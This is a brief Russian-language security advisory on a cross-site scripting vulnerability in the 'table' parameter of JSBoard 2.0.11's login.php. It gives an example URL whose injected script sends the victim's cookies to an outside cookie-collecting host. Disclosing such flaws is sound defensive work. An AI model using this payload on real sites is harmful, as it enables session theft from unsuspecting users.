Программа: JSBoard 2.0.11 и более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "table"
сценария login.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

http://[target]/jsboard/login.php?table=<script>document.location= ‘http://www.cgi-security.com/cgi-bin/cookie.cgi’%2Bdocument.cookie</script>

 



Оставить мнение